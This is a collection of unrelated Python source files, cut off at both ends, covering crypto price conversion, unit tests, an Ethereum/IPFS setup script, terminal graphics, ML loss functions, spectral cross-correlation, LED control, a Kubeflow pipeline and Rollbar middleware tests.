        response = requests.get('https://api.cryptonator.com/api/ticker/btc-' + coin_name.lower()).json()
        if response['success']:
            return float(count) / float(response['ticker']['price'])
        else:
            return 0


def get_usd_value(coin_name=None, count=None):
    time.sleep(0.1)
    if not coin_name or not count:
        return 0
    else:
        if coin_name == 'dsh' or coin_name == 'DSH':
            coin_name = 'dash'
        response = requests.get('https://api.cryptonator.com/api/ticker/usd-' + coin_name.lower()).json()
        if response['success']:
            return float(count) / float(response['ticker']['price'])
        else:
            return 0


class CryptoConvert:
    def __init__(self, coin_one_name, coin_two_name):
        if coin_two_name == 'dsh' or coin_two_name == 'DSH':
            coin_two_name = 'dash'
        if coin_one_name == 'dsh' or coin_one_name == 'DSH':
            coin_one_name = 'dash'
        self.coin_one_name = coin_one_name
        self.coin_two_name = coin_two_name
        self.price = None

    def get_price(self):
        if self.price is None:
            response = requests.get(
                'https://api.cryptonator.com/api/ticker/' + self.coin_one_name.lower() + '-' +
                self.coin_two_name.lower()).json()
            if response['success']:
                self.price = response['ticker']['price']
        return self.price

    def convert(self, coin_one_name, coin_two_name, count):
        if coin_one_name == self.coin_one_name and coin_two_name == self.coin_two_name:
            self.get_price()
        else:
            self.coin_one_name = coin_one_name
            self.coin_two_name = coin_two_name
            self.price = None
            self.get_price()
        return float(count) / float(self.price)
11570483
import machine
import pytest


@pytest.fixture
def timer():
    return machine.Timer(0)


def test_timer_does_not_run_on_construction(timer):
    assert not timer.is_running_for_testing


def test_timer_runs_on_init(timer):
    timer.init(period=1000)
    assert timer.is_running_for_testing
11570517
from django.conf import settings

DEFAULT_CONDITIONS = [
    ('django_email_multibackend.conditions.MatchAll', {})
]

EMAIL_BACKENDS_CONDITIONS = getattr(settings, 'EMAIL_BACKENDS_CONDITIONS', {})
EMAIL_BACKENDS_WEIGHTS = getattr(settings, 'EMAIL_BACKENDS_WEIGHTS', tuple())
EMAIL_BACKENDS = getattr(settings, 'EMAIL_BACKENDS', {})
11570540
import warnings
import sys
import os
from distutils.version import StrictVersion


def warn(msg):
    print(msg)
    warnings.warn(msg)
    warn.count += 1

warn.count = 0


def check_import(package_name, version=None):
    try:
        pkg = __import__(package_name)
    except ImportError:
        warn("Package {0} is not available".format(package_name))
        return
    if version:
        pkg_version = pkg.__version__.rstrip('git').rstrip('-')
        # compare two StrictVersion objects rather than a version to a string
        if StrictVersion(str(pkg_version)) < StrictVersion(str(version)):
            warn("Package {0} is version {1}; "
                 "{2} or greater is recommended".format(pkg, pkg.__version__, version))


# check Python version
if not (2, 6) <= sys.version_info[:2] <= (2, 7):
    warn("Python 2.6 - 2.7 recommended")

# check package versions
check_import('numpy', '1.5')
check_import('scipy', '0.11')
check_import('IPython', '0.13')
check_import('matplotlib', '1.0')
check_import('sklearn', '0.12')
check_import('nose')

if warn.count > 0:
    print(" - warning count: {0}.".format(warn.count))
    print("   Consider upgrading your Python install:")
    print("   Anaconda is a good all-in-one option: ")
    print("   https://store.continuum.io/")
else:
    print(" - no warnings: Congratulations! ")
    print("   Your Python installation appears up-to-date!")

print(" - please confirm that typing ``ipython notebook`` at your terminal")
print("   launches a browser window to the IPython dashboard. If not,")
print("   then there are other packages which must be installed. For")
print("   an easy all-in-one installation, try Anaconda:")
print("   https://store.continuum.io/")
11570570
import os

from dash_slicer.docs import get_reference_docs, md_seperator

HERE = os.path.dirname(os.path.abspath(__file__))


def test_that_the_docs_build():
    x = get_reference_docs()
    assert "VolumeSlicer(app, vol" in x
    assert "create_overlay_data(mask" in x
    assert "performance" in x.lower()


def test_that_reference_docs_in_readme_are_up_to_date():
    filename = os.path.join(os.path.dirname(HERE), "README.md")
    assert os.path.isfile(filename)
    with open(filename, "rb") as f:
        text = f.read().decode()
    _, _, ref = text.partition(md_seperator)
    ref1 = ref.strip().replace("\r\n", "\n")
    ref2 = get_reference_docs().strip()
    assert (
        ref1 == ref2
    ), "Reference docs in readme are outdated. Run `python update_docs_in_readme.py`"
11570580
class Pizza:
    def ingredientes(self):
        return 'Ingredientes'


class Mussarela(Pizza):
    def ingredientes(self):
        return ['queijo mussarela', 'molho de tomate', 'oregano']
11570599
import os, json
import ipfsapi
from web3 import Web3, IPCProvider
from populus.utils.wait import wait_for_transaction_receipt

w3 = Web3(IPCProvider('/tmp/geth.ipc'))

common_password = '<PASSWORD>'
accounts = []
with open('accounts.txt', 'w') as f:
    for i in range(4):
        account = w3.personal.newAccount(common_password)
        accounts.append(account)
        f.write(account + "\n")

with open('address.txt', 'r') as f:
    address = f.read().rstrip("\n")

with open('videos_sharing_smart_contract/build/contracts.json') as f:
    contract = json.load(f)

abi = contract['VideosSharing']['abi']
VideosSharing = w3.eth.contract(address=address, abi=abi)

c = ipfsapi.connect()

coinbase = w3.eth.accounts[0]
coinbase_password = '<PASSWORD>'

# Transfering Ethers
for destination in accounts:
    nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(coinbase))
    txn = {
        'from': coinbase,
        'to': Web3.toChecksumAddress(destination),
        'value': w3.toWei('100', 'ether'),
        'gas': 70000,
        'gasPrice': w3.toWei('1', 'gwei'),
        'nonce': nonce
    }
    txn_hash = w3.personal.sendTransaction(txn, coinbase_password)
    wait_for_transaction_receipt(w3, txn_hash)

# Transfering Coins
for destination in accounts:
    nonce = w3.eth.getTransactionCount(coinbase)
    txn = VideosSharing.functions.transfer(destination, 100).buildTransaction({
        'from': coinbase,
        'gas': 70000,
        'gasPrice': w3.toWei('1', 'gwei'),
        'nonce': nonce
    })
    txn_hash = w3.personal.sendTransaction(txn, coinbase_password)
    wait_for_transaction_receipt(w3, txn_hash)

# Uploading Videos
directory = 'stock_videos'
movies = os.listdir(directory)
length_of_movies = len(movies)

for index, movie in enumerate(movies):
    account = accounts[index//7]
    ipfs_add = c.add(directory + '/' + movie)
    ipfs_path = ipfs_add['Hash'].encode('utf-8')
    title = movie.rstrip('.mp4')[:20].encode('utf-8')
    nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(account))
    txn = VideosSharing.functions.upload_video(ipfs_path, title).buildTransaction({
        'from': account,
        'gas': 200000,
        'gasPrice': w3.toWei('30', 'gwei'),
        'nonce': nonce
    })
    txn_hash = w3.personal.sendTransaction(txn, common_password)
    wait_for_transaction_receipt(w3, txn_hash)
11570646
from contextlib import contextmanager

from bearlibterminal import terminal as _terminal

from .nice_terminal import NiceTerminal
from .state import blt_state
from clubsandwich.geom import Point


class BearLibTerminalContext(NiceTerminal):
    """
    A class that acts like :py:attr:`clubsandwich.blt.nice_terminal.terminal`
    (you can use :py:class:`Point` and :py:class:`Rect` instead of separate
    ints), except:

    * It's a class, so you have to instantiate it
    * It includes a context manager, :py:meth:`translate`, that offsets all
      position-related calls.
    * Multiple calls to :py:meth:`color` and :py:meth:`bkcolor` with the same
      values are ignored, saving time in the C FFI bridge.

    Example::

        from clubsandwich.blt.context import BearLibTerminalContext
        from clubsandwich.geom import Point

        ctx = BearLibTerminalContext()
        ctx.open()

        a = Point(10, 10)
        with ctx.translate(a):
            terminal.put(Point(0, 0), 'a')
            terminal.put(Point(1, 1), 'b')
        terminal.refresh()
        terminal.read()
        terminal.close()
    """

    def __init__(self):
        super().__init__()
        self.offset = Point(0, 0)
        self._crop_rect = None
        self._fg = blt_state.color
        self._bg = blt_state.bkcolor

    @contextmanager
    def translate(self, offset_delta):
        """
        Inside this context manager, all put/print calls are offset by the
        given amount. If you nest these, they stack.
        """
        old_offset = self.offset
        self.offset = self.offset + offset_delta
        yield
        self.offset = old_offset

    def color(self, c):
        self._fg = c
        return _terminal.color(c)

    def bkcolor(self, c):
        self._bg = c
        return _terminal.bkcolor(c)

    def clear_area(self, rect, *args):
        computed_rect = rect.moved_by(self.offset)
        if self._crop_rect and not self._crop_rect.intersects(computed_rect):
            return
        return super().clear_area(computed_rect, *args)

    def crop(self, rect, *args):
        computed_rect = rect.moved_by(self.offset)
        if self._crop_rect and not self._crop_rect.intersects(rect):
            return
        return super().crop(computed_rect, *args)

    def print(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().print(computed_point, *args)

    def printf(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().printf(computed_point, *args)

    def put(self, point, char):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().put(computed_point, char)

    def pick(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().pick(computed_point, *args)

    def pick_color(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().pick_color(computed_point, *args)

    def pick_bkcolor(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().pick_bkcolor(computed_point, *args)

    def put_ext(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().put_ext(computed_point, *args)

    def read_str(self, point, *args):
        computed_point = point + self.offset
        if self._crop_rect and not self._crop_rect.contains(computed_point):
            return
        return super().read_str(computed_point, *args)
11570655
import numpy as np

from deepnet.utils import softmax
from deepnet.layers import Conv, FullyConnected


def l2_regularization(layers, lam=0.001):
    reg_loss = 0.0
    for layer in layers:
        if hasattr(layer, 'W'):
            reg_loss += 0.5 * lam * np.sum(layer.W * layer.W)
    return reg_loss


def delta_l2_regularization(layers, grads, lam=0.001):
    for layer, grad in zip(layers, reversed(grads)):
        if hasattr(layer, 'W'):
            grad[0] += lam * layer.W
    return grads


def l1_regularization(layers, lam=0.001):
    reg_loss = 0.0
    for layer in layers:
        if hasattr(layer, 'W'):
            reg_loss += lam * np.sum(np.abs(layer.W))
    return reg_loss


def delta_l1_regularization(layers, grads, lam=0.001):
    for layer, grad in zip(layers, reversed(grads)):
        if hasattr(layer, 'W'):
            grad[0] += lam * layer.W / (np.abs(layer.W) + 1e-8)
    return grads


def SoftmaxLoss(X, y):
    m = y.shape[0]
    p = softmax(X)
    log_likelihood = -np.log(p[range(m), y])
    loss = np.sum(log_likelihood) / m
    dx = p.copy()
    dx[range(m), y] -= 1
    dx /= m
    return loss, dx
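
# A small numeric sanity check mirroring SoftmaxLoss above. It uses a local
# stand-in for deepnet.utils.softmax so the snippet runs on its own; the
# logits and labels are made up.
if __name__ == "__main__":
    def _softmax(X):
        e = np.exp(X - np.max(X, axis=1, keepdims=True))
        return e / np.sum(e, axis=1, keepdims=True)

    X = np.array([[2.0, 1.0, 0.1],
                  [0.5, 2.5, 0.0]])
    y = np.array([0, 1])
    p = _softmax(X)
    m = y.shape[0]
    loss = -np.log(p[range(m), y]).sum() / m  # cross-entropy, ~0.31 here
    dx = p.copy()
    dx[range(m), y] -= 1
    dx /= m
    print(loss, dx.sum())  # gradient entries sum to 0 across each example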
11570725
import matplotlib.pylab as plt
import os
import sys
import numpy
import scipy
from scipy import interpolate
from scipy import integrate


def intercec(A, B):
    if A[0] < B[0]:
        ini = B[0]
    else:
        ini = A[0]
    if A[-1] < B[-1]:
        fin = A[-1]
    else:
        fin = B[-1]
    return ini, fin


def CCF(L1, F1, L2, F2, vi, vf):
    lux = 299792.458
    vel = vi
    delta = L1[1] - L1[0]
    CF = []
    vels = []
    while vel <= vf:
        L2p = L2 * (1 - vel / lux)
        ini, fin = intercec(L1, L2p)
        I = numpy.where((L1 >= ini) & (L1 <= fin))[0]
        II = numpy.where((L2p >= ini) & (L2p <= fin))[0]
        if len(I) == 0 or len(II) == 0:
            print('Problem: no wavelength intersection')
        wav = numpy.arange(ini, fin, delta)
        tck1 = interpolate.splrep(L1, F1, k=3, s=0)
        tck2 = interpolate.splrep(L2p, F2, k=3, s=0)
        F1s = interpolate.splev(wav, tck1, der=0)
        F2s = interpolate.splev(wav, tck2, der=0)
        CF.append(numpy.add.reduce(F1s * F2s) /
                  numpy.sqrt(numpy.add.reduce(F1s * F1s) * numpy.add.reduce(F2s * F2s)))
        vels.append(vel)
        vel = vel + 1
    return vels, CF
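
# A minimal sketch exercising CCF above with synthetic spectra: the same
# Gaussian absorption line, one copy Doppler-shifted. The peak of the
# cross-correlation should land near the applied velocity (numbers made up).
if __name__ == '__main__':
    lux = 299792.458
    L1 = numpy.arange(5000.0, 5100.0, 0.05)
    F1 = 1.0 - 0.5 * numpy.exp(-0.5 * ((L1 - 5050.0) / 0.3) ** 2)
    v_true = 12.0  # km/s
    L2 = L1 / (1 - v_true / lux)  # shifted so vel == v_true realigns it
    F2 = F1.copy()
    vels, CF = CCF(L1, F1, L2, F2, 0, 25)
    print('best velocity:', vels[int(numpy.argmax(CF))])  # expect ~12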
11570733
from typing import List

import hid

import mystic_why.common.const as const
from mystic_why.common.enums import LightArea
from mystic_why.common.exception import DeviceNotFound, AreaNotFound


class Color:
    @staticmethod
    def create_by_hex(hex_value):
        hex_value = hex_value.lstrip('#')
        return Color(*tuple(int(hex_value[i:i + 2], 16) for i in (0, 2, 4)))

    def __init__(self, red, green, blue):
        self.red = red
        self.green = green
        self.blue = blue


class Led:
    def __init__(self, index: int, color: Color):
        self.index = index
        self.color = color


class BaseLightning:
    def __init__(self):
        self.device = hid.device()
        self.open_device()

    def get_current_state(self):
        return self.device.get_feature_report(const.HID_STATE_REPORT_ID, const.HID_STATE_REPORT_LEN)

    def open_device(self):
        try:
            device_info = next(d for d in hid.enumerate() if d['product_string'] == const.MSI_PRODUCT_STRING)
        except StopIteration:
            raise DeviceNotFound
        self.device.open(device_info['vendor_id'], device_info['product_id'])


class FullLightning(BaseLightning):
    def __init__(self):
        super().__init__()
        self.msg = []

    def fill_color_for_area(self, area, color: Color):
        if area == LightArea.JONBOARD:
            color_bytes = [const.FULL_LIGHT_ONBOARD]
        elif area == LightArea.JRAINBOW1:
            color_bytes = [const.FULL_LIGHT_JRAINBOW1]
        elif area == LightArea.JRAINBOW2:
            color_bytes = [const.FULL_LIGHT_JRAINBOW2]
        else:
            color_bytes = [const.FULL_LIGHT_ONBOARD, const.FULL_LIGHT_JRAINBOW1, const.FULL_LIGHT_JRAINBOW2]
        for color_byte in color_bytes:
            self.msg[color_byte] = color.red
            self.msg[color_byte + 1] = color.green
            self.msg[color_byte + 2] = color.blue

    def set_full_light(self, color: Color, area='ALL'):
        self.msg = self.get_current_state()
        self.fill_color_for_area(area, color)
        self.device.send_feature_report(self.msg)


class PerLedLightning(BaseLightning):
    def __init__(self, enable=True):
        super().__init__()
        self.current_state = self.get_current_state()
        if enable:
            self.enable_per_led()

    def enable_per_led(self):
        self.device.send_feature_report(const.ENABLE_PER_LED_MSG)

    def revert_to_full(self):
        self.device.send_feature_report(self.current_state)

    def set_led_colors(self, feature_data: List[int], led_info: List[Led]):
        for led in led_info:
            feature_data[(led.index % (len(feature_data) // 3)) * 3] = led.color.red
            feature_data[(led.index % (len(feature_data) // 3)) * 3 + 1] = led.color.green
            feature_data[(led.index % (len(feature_data) // 3)) * 3 + 2] = led.color.blue

    def get_color_bytes_by_area(self, area, current_state: List[int]):
        area_info = {
            LightArea.JONBOARD: {'start_byte': const.FULL_LIGHT_ONBOARD, 'led_count': const.ONBOARD_LED_COUNT},
            LightArea.JRAINBOW1: {'start_byte': const.FULL_LIGHT_JRAINBOW1, 'led_count': const.JRAINBOW1_LED_COUNT},
            LightArea.JRAINBOW2: {'start_byte': const.FULL_LIGHT_JRAINBOW2, 'led_count': const.JRAINBOW2_LED_COUNT}
        }
        try:
            selected_area = area_info[area]
        except KeyError:
            raise AreaNotFound
        start_byte = selected_area['start_byte']
        led_count = selected_area['led_count']
        return [current_state[start_byte], current_state[start_byte + 1], current_state[start_byte + 2]] * led_count

    def set_led_light(self, area, led_info, background_color=None):
        if background_color is None:
            background_color = Color(0, 0, 0)
        msg_onboard = self.get_color_bytes_by_area(LightArea.JONBOARD, self.current_state)
        msg_rainbow1 = self.get_color_bytes_by_area(LightArea.JRAINBOW1, self.current_state)
        msg_rainbow2 = self.get_color_bytes_by_area(LightArea.JRAINBOW2, self.current_state)
        # TODO: not supported
        msg_corsair = [0, 0, 0] * const.CORSAIR_LED_COUNT
        empty_trail = [0] * const.EMPTY_TRAIL_LEN
        if area == LightArea.JONBOARD:
            if background_color:
                msg_onboard = [background_color.red, background_color.green,
                               background_color.blue] * const.ONBOARD_LED_COUNT
            self.set_led_colors(msg_onboard, led_info)
        elif area == LightArea.JRAINBOW1:
            if background_color:
                msg_rainbow1 = [background_color.red, background_color.green,
                                background_color.blue] * const.JRAINBOW1_LED_COUNT
            self.set_led_colors(msg_rainbow1, led_info)
        elif area == LightArea.JRAINBOW2:
            if background_color:
                msg_rainbow2 = [background_color.red, background_color.green,
                                background_color.blue] * const.JRAINBOW2_LED_COUNT
            self.set_led_colors(msg_rainbow2, led_info)
        elif area == LightArea.ALL:
            if background_color:
                msg_onboard = [background_color.red, background_color.green,
                               background_color.blue] * const.ONBOARD_LED_COUNT
                msg_rainbow1 = [background_color.red, background_color.green,
                                background_color.blue] * const.JRAINBOW1_LED_COUNT
                msg_rainbow2 = [background_color.red, background_color.green,
                                background_color.blue] * const.JRAINBOW2_LED_COUNT
            self.set_led_colors(msg_onboard, led_info)
            self.set_led_colors(msg_rainbow1, led_info)
            self.set_led_colors(msg_rainbow2, led_info)
        else:
            raise AreaNotFound
        feature_data = const.PER_LED_MSG_HEADER + msg_onboard + msg_rainbow1 + msg_rainbow2 + msg_corsair + empty_trail
        self.device.send_feature_report(feature_data)
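
# A quick sketch of the Color helper above; the hex parsing needs no hardware,
# while the commented-out PerLedLightning call would require an MSI board.
if __name__ == '__main__':
    amber = Color.create_by_hex('#ffbf00')
    print(amber.red, amber.green, amber.blue)  # 255 191 0
    # lightning = PerLedLightning()
    # lightning.set_led_light(LightArea.JONBOARD, [Led(0, amber)])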
11570741
from backend.common.consts.model_type import ModelType
from backend.common.models.account import Account
from backend.common.models.favorite import Favorite
from backend.common.queries.favorite_query import FavoriteQuery


def test_no_favorites() -> None:
    account = Account(id="uid")
    favorites = FavoriteQuery(account=account).fetch()
    assert favorites == []


def test_favorites() -> None:
    account = Account(id="uid")
    favorite = Favorite(
        parent=account.key,
        user_id=account.key.id(),
        model_key="frc7332",
        model_type=ModelType.TEAM,
    )
    favorite.put()

    favorites = FavoriteQuery(account=account).fetch()
    assert favorites == [favorite]


def test_favorites_keys_only() -> None:
    account = Account(id="uid")
    favorite = Favorite(
        parent=account.key,
        user_id=account.key.id(),
        model_key="frc7332",
        model_type=ModelType.TEAM,
    )
    favorite.put()

    favorites = FavoriteQuery(account=account, keys_only=True).fetch()
    assert favorites == [favorite.key]
11570775
import kfp.dsl as dsl
import kfp.gcp as gcp


def evaluate_op(
    *,
    gcs_bucket,
    pose_estimation_gcs_path,
    log_dir,
    docker_image,
    memory_limit,
    num_gpu,
    gpu_type,
    checkpoint_file=None,
):
    """
    Create a Kubeflow ContainerOp to evaluate an estimator on the cube sphere dataset.

    Args:
        gcs_bucket: GCS Bucket where the datasets are located
        pose_estimation_gcs_path: Path inside the gcp bucket where the datasets are located
        log_dir: path to save the Tensorboard event files.
        docker_image (str): Docker image registry URI.
        memory_limit (str): Set memory limit for this operator. For simplicity,
            we set memory_request = memory_limit.
        num_gpu (int): Set the number of GPU for this operator
        gpu_type (str): Set the type of GPU

    Returns:
        kfp.dsl.ContainerOp: Represents an op implemented by a container image
        to evaluate an estimator.
    """
    command = ["python", "-m", "pose_estimation.cli"]
    arguments = [
        "evaluate",
        "--config-file=config.yaml",
        "--download-data-gcp=True",
        f"--gcs-bucket={gcs_bucket}",
        f"--pose-estimation-gcs-path={pose_estimation_gcs_path}",
        f"--log-dir={log_dir}",
    ]

    evaluate = dsl.ContainerOp(
        name="evaluate",
        image=docker_image,
        command=command,
        arguments=arguments,
    )

    # GPU
    evaluate.set_gpu_limit(num_gpu)
    evaluate.add_node_selector_constraint(
        "cloud.google.com/gke-accelerator", gpu_type
    )
    evaluate.set_memory_request(memory_limit)
    evaluate.set_memory_limit(memory_limit)
    evaluate.apply(gcp.use_gcp_secret("user-gcp-sa"))
    return evaluate


@dsl.pipeline(
    name="evaluate pipeline",
    description="evaluate the model using kubeflow pipeline",
)
def evaluate_pipeline_single_cube(
    docker_image: str = "",
    gcs_bucket: str = "",
    pose_estimation_gcs_path: str = "",
    logdir: str = "",
):
    memory_limit = "64Gi"
    num_gpu = 1
    gpu_type = "nvidia-tesla-v100"

    # Pipeline definition
    evaluate_op(
        gcs_bucket=gcs_bucket,
        pose_estimation_gcs_path=pose_estimation_gcs_path,
        log_dir=logdir,
        docker_image=docker_image,
        memory_limit=memory_limit,
        num_gpu=num_gpu,
        gpu_type=gpu_type,
    )


if __name__ == "__main__":
    import kfp.compiler as compiler

    compiler.Compiler().compile(
        evaluate_pipeline_single_cube, __file__ + ".tar.gz"
    )
11570787
def launchTensorBoard():
    import os
    PATH = os.getcwd()
    os.system('tensorboard --logdir=' + 'embedding-logs')
    return


import threading

t = threading.Thread(target=launchTensorBoard, args=([]))
t.start()

# In your browser, enter http://localhost:6006 as the URL
# add #projector to the URL if necessary: http://localhost:6006/#projector
11570808
import os
from collections import namedtuple

import pytest

from leapp.exceptions import StopActorExecutionError
from leapp.libraries.actor import addupgradebootentry
from leapp.libraries.common.config.architecture import ARCH_X86_64, ARCH_S390X
from leapp.libraries.common.testutils import CurrentActorMocked
from leapp.libraries.stdlib import api
from leapp.models import BootContent

CUR_DIR = os.path.dirname(os.path.abspath(__file__))


class run_mocked(object):
    def __init__(self):
        self.args = []

    def __call__(self, args, split=False):
        self.args.append(args)


class write_to_file_mocked(object):
    def __init__(self):
        self.content = None

    def __call__(self, filename, content):
        self.content = content


CONFIGS = ['/boot/grub2/grub.cfg', '/boot/efi/EFI/redhat/grub.cfg']

RunArgs = namedtuple('RunArgs', 'args_remove args_add args_zipl args_len')

run_args_remove = [
    '/usr/sbin/grubby',
    '--remove-kernel', '/abc'
]

run_args_add = [
    '/usr/sbin/grubby',
    '--add-kernel', '/abc',
    '--initrd', '/def',
    '--title', 'RHEL-Upgrade-Initramfs',
    '--copy-default',
    '--make-default',
    '--args',
    'debug enforcing=0 rd.plymouth=0 plymouth.enable=0'
]

run_args_zipl = ['/usr/sbin/zipl']


@pytest.mark.parametrize('run_args, arch', [
    # non s390x
    (RunArgs(run_args_remove, run_args_add, None, 2), ARCH_X86_64),
    # s390x
    (RunArgs(run_args_remove, run_args_add, run_args_zipl, 3), ARCH_S390X),
    # config file specified
    (RunArgs(run_args_remove, run_args_add, None, 2), ARCH_X86_64),
])
def test_add_boot_entry(monkeypatch, run_args, arch):
    def get_boot_file_paths_mocked():
        return '/abc', '/def'

    monkeypatch.setattr(addupgradebootentry, 'get_boot_file_paths', get_boot_file_paths_mocked)
    monkeypatch.setenv('LEAPP_DEBUG', '1')
    monkeypatch.setattr(addupgradebootentry, 'run', run_mocked())
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(arch))

    addupgradebootentry.add_boot_entry()

    assert len(addupgradebootentry.run.args) == run_args.args_len
    assert addupgradebootentry.run.args[0] == run_args.args_remove
    assert addupgradebootentry.run.args[1] == run_args.args_add
    if run_args.args_zipl:
        assert addupgradebootentry.run.args[2] == run_args.args_zipl


def test_add_boot_entry_configs(monkeypatch):
    def get_boot_file_paths_mocked():
        return '/abc', '/def'

    monkeypatch.setattr(addupgradebootentry, 'get_boot_file_paths', get_boot_file_paths_mocked)
    monkeypatch.setenv('LEAPP_DEBUG', '1')
    monkeypatch.setattr(addupgradebootentry, 'run', run_mocked())
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(ARCH_X86_64))

    addupgradebootentry.add_boot_entry(CONFIGS)

    assert len(addupgradebootentry.run.args) == 4
    assert addupgradebootentry.run.args[0] == run_args_remove + ['-c', CONFIGS[0]]
    assert addupgradebootentry.run.args[1] == run_args_remove + ['-c', CONFIGS[1]]
    assert addupgradebootentry.run.args[2] == run_args_add + ['-c', CONFIGS[0]]
    assert addupgradebootentry.run.args[3] == run_args_add + ['-c', CONFIGS[1]]


def test_get_boot_file_paths(monkeypatch):
    # BootContent message available
    def consume_message_mocked(*models):
        yield BootContent(kernel_path='/ghi', initram_path='/jkl')

    monkeypatch.setattr('leapp.libraries.stdlib.api.consume', consume_message_mocked)

    kernel_path, initram_path = addupgradebootentry.get_boot_file_paths()

    assert kernel_path == '/ghi' and initram_path == '/jkl'

    # No BootContent message available
    def consume_no_message_mocked(*models):
        yield None

    monkeypatch.setattr('leapp.libraries.stdlib.api.consume', consume_no_message_mocked)

    with pytest.raises(StopActorExecutionError):
        addupgradebootentry.get_boot_file_paths()


def test_fix_grub_config_error(monkeypatch):
    monkeypatch.setattr(addupgradebootentry, 'write_to_file', write_to_file_mocked())
    addupgradebootentry.fix_grub_config_error(os.path.join(CUR_DIR, 'files/grub_test.wrong'))

    with open(os.path.join(CUR_DIR, 'files/grub_test.fixed')) as f:
        assert addupgradebootentry.write_to_file.content == f.read()
11570827
from django.conf.urls import url

from corehq.messaging.smsbackends.apposit.views import AppositIncomingView

urlpatterns = [
    url(r'^in/(?P<api_key>[\w-]+)/$', AppositIncomingView.as_view(),
        name=AppositIncomingView.urlname),
]
11570828
import copy
import importlib
import sys

try:
    from unittest import mock
except ImportError:
    import mock

import unittest2

import rollbar
from rollbar.lib._async import AsyncMock
from rollbar.test import BaseTest

ALLOWED_PYTHON_VERSION = sys.version_info >= (3, 5)
ASYNC_REPORT_ENABLED = sys.version_info >= (3, 6)


@unittest2.skipUnless(ALLOWED_PYTHON_VERSION, 'ASGI implementation requires Python3.5+')
class ReporterMiddlewareTest(BaseTest):
    default_settings = copy.deepcopy(rollbar.SETTINGS)

    def setUp(self):
        importlib.reload(rollbar)
        rollbar.SETTINGS = copy.deepcopy(self.default_settings)
        rollbar.SETTINGS['handler'] = 'async'

    @mock.patch('rollbar.report_exc_info')
    def test_should_catch_and_report_errors(self, mock_report):
        from rollbar.contrib.asgi.middleware import ReporterMiddleware
        from rollbar.lib._async import FailingTestASGIApp, run

        testapp = ReporterMiddleware(FailingTestASGIApp())

        with self.assertRaises(RuntimeError):
            run(testapp({'type': 'http'}, None, None))

        self.assertTrue(mock_report.called)

        args, kwargs = mock_report.call_args
        self.assertEqual(kwargs, {})

        exc_type, exc_value, exc_tb = args[0]
        self.assertEqual(exc_type, RuntimeError)
        self.assertIsInstance(exc_value, RuntimeError)

    @mock.patch('rollbar._check_config', return_value=True)
    @mock.patch('rollbar.send_payload')
    def test_should_add_framework_name_to_payload(self, mock_send_payload, *mocks):
        import rollbar
        from rollbar.contrib.asgi.middleware import ReporterMiddleware

        self.assertIsNone(rollbar.BASE_DATA_HOOK)

        ReporterMiddleware(None)  # invoke integration
        rollbar.report_exc_info()

        self.assertTrue(mock_send_payload.called)

        payload = mock_send_payload.call_args[0][0]

        self.assertIn('asgi', payload['data']['framework'])

    @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+')
    @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock)
    @mock.patch('rollbar.report_exc_info')
    def test_should_use_async_report_exc_info_if_default_handler(
        self, sync_report_exc_info, async_report_exc_info
    ):
        import rollbar
        from rollbar.contrib.asgi.middleware import ReporterMiddleware
        from rollbar.lib._async import FailingTestASGIApp, run

        rollbar.SETTINGS['handler'] = 'default'

        testapp = ReporterMiddleware(FailingTestASGIApp())

        with self.assertRaises(RuntimeError):
            run(testapp({'type': 'http'}, None, None))

        self.assertTrue(async_report_exc_info.called)
        self.assertFalse(sync_report_exc_info.called)

    @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+')
    @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock)
    @mock.patch('rollbar.report_exc_info')
    def test_should_use_async_report_exc_info_if_any_async_handler(
        self, sync_report_exc_info, async_report_exc_info
    ):
        import rollbar
        from rollbar.contrib.asgi.middleware import ReporterMiddleware
        from rollbar.lib._async import FailingTestASGIApp, run

        rollbar.SETTINGS['handler'] = 'httpx'

        testapp = ReporterMiddleware(FailingTestASGIApp())

        with self.assertRaises(RuntimeError):
            run(testapp({'type': 'http'}, None, None))

        self.assertTrue(async_report_exc_info.called)
        self.assertFalse(sync_report_exc_info.called)

    @unittest2.skipUnless(ASYNC_REPORT_ENABLED, 'Requires Python 3.6+')
    @mock.patch('logging.Logger.warning')
    @mock.patch('rollbar.lib._async.report_exc_info', new_callable=AsyncMock)
    @mock.patch('rollbar.report_exc_info')
    def test_should_use_sync_report_exc_info_if_non_async_handlers(
        self, sync_report_exc_info, async_report_exc_info, mock_log
    ):
        import rollbar
        from rollbar.contrib.asgi.middleware import ReporterMiddleware
        from rollbar.lib._async import FailingTestASGIApp, run

        rollbar.SETTINGS['handler'] = 'threading'

        testapp = ReporterMiddleware(FailingTestASGIApp())

        with self.assertRaises(RuntimeError):
            run(testapp({'type': 'http'}, None, None))

        self.assertFalse(async_report_exc_info.called)
        self.assertTrue(sync_report_exc_info.called)
        mock_log.assert_called_once_with(
            'Failed to report asynchronously. Trying to report synchronously.'
        )

    def test_should_support_http_only(self):
        from rollbar.contrib.asgi.middleware import ReporterMiddleware
        from rollbar.lib._async import FailingTestASGIApp, run

        testapp = ReporterMiddleware(FailingTestASGIApp())

        with mock.patch('rollbar.report_exc_info') as mock_report:
            with self.assertRaises(RuntimeError):
                run(testapp({'type': 'http'}, None, None))
            self.assertTrue(mock_report.called)

        with mock.patch('rollbar.report_exc_info') as mock_report:
            with self.assertRaises(RuntimeError):
                run(testapp({'type': 'websocket'}, None, None))
            self.assertFalse(mock_report.called)

    def test_should_support_type_hints(self):
        from rollbar.contrib.asgi.types import Receive, Scope, Send

        self.assertDictEqual(
